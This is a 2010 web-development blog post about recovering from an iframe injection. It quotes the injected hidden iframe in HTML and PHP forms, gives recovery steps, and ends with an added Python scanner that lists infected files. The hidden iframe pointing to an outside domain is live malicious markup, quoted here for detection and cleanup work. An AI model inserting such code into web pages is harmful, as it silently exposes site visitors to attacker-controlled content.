16 February 2010

Iframe Injection (A Story with a Lot of Pain)

Hi everyone,
First of all, I would like to welcome you all to our new blog. We'll try to post useful articles here about technology, software development, social networking, the internet and more.

Anyway, 5 months ago a small problem occurred at our office: suddenly an evil iframe injection decided to take down two of our clients' websites.
Rotem and Modi, two of the world's most talented web developers (-:, got into the picture and resolved the problem with the guidance of Ronnen (one of the CodeOasis partners) and with a tiny bit of assistance from me.

This is the injected code that tells you you've been hit by the iframe injection:

<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> (in HTML files)

OR

echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; (in PHP files)

I decided to write this post to help every poor human or developer solve this annoying problem using an ASP script, something we couldn't find anywhere on the net (there are only PHP scripts).

These are the steps we went through against the evil iframe injection:

1. The first thing is to change the passwords of your FTP, database, and control panel.
2. Set the file permissions on your server to a secure mode (e.g., restrict access for any anonymous or Internet user). You need to contact your hosting company for this task.
3. Download your web files from the server and check them for infections. Clean the infected files. (Please contact your programmer/developer for this task.)
4. Scan and clean the PCs/workstations that you use for logging into your web hosting server.
5. Avoid using public/shared computers to access your server.

How do I clean the infected files?

Search for all pages containing the malicious code and replace it with a space.
Rotem, one of the Code Oasis developers, developed an ASP script that creates a list of all damaged files and allows you to go over them manually and clean out the hostile iframes (it couldn't be done automatically because the iframe injection blocked access to some of the files). You can download Rotem's script HERE!!!
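
The listing step described above, as an added example in Python (this is not Rotem's ASP script, which is not reproduced on this page): it walks a downloaded copy of the site and reports each file and line holding a hidden iframe, plus any files it could not read so they can be checked by hand. The function names, the extension list and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Opening <iframe> tag and its src; quotes may be backslash-escaped (PHP echo).
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""src\s*=\s*\\?["']?([^\s"'\\>]+)""", re.IGNORECASE)
# Traits of the tag quoted in the post (1-pixel size, visibility:hidden);
# matching a 0-pixel size as well is an added assumption.
HIDDEN = re.compile(
    r"""(?:width|height)\s*=\s*\\?["']?[01]\b|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".html", ".htm", ".php", ".asp", ".aspx", ".inc", ".js"}  # assumed list


def scan_tree(root):
    """Return (findings, unreadable); findings are (path, line_no, src) tuples."""
    findings, unreadable = [], []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        except OSError:
            unreadable.append(str(path))  # could not open: review this file manually
            continue
        for line_no, line in enumerate(lines, start=1):
            for tag in IFRAME_TAG.findall(line):
                if HIDDEN.search(tag):
                    src = SRC_ATTR.search(tag)
                    findings.append((str(path), line_no, src.group(1) if src else ""))
    return findings, unreadable


def demo():
    """Scan a constructed sample tree: an HTML hit, a PHP hit and a clean file."""
    injected = ('<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 '
                'style="visibility:hidden;position:absolute"></iframe>')
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "index.html": "<html><body>Hello</body></html>\n" + injected + "\n",
            "page.php": '<?php\necho "' + injected.replace('"', '\\"') + '";\n',
            "video.html": '<iframe src="https://example.com/player" width="640" height="360"></iframe>\n',
        }
        for name, body in samples.items():
            Path(root, name).write_text(body, encoding="utf-8")
        return [(Path(p).name, n, s) for p, n, s in scan_tree(root)[0]]


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

The scanner only lists matches and never rewrites files, so a legitimate visible iframe (the `video.html` sample) is left out of the report and every reported line still gets a manual look before cleaning.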

That's all for today. I hope someone will find this post helpful.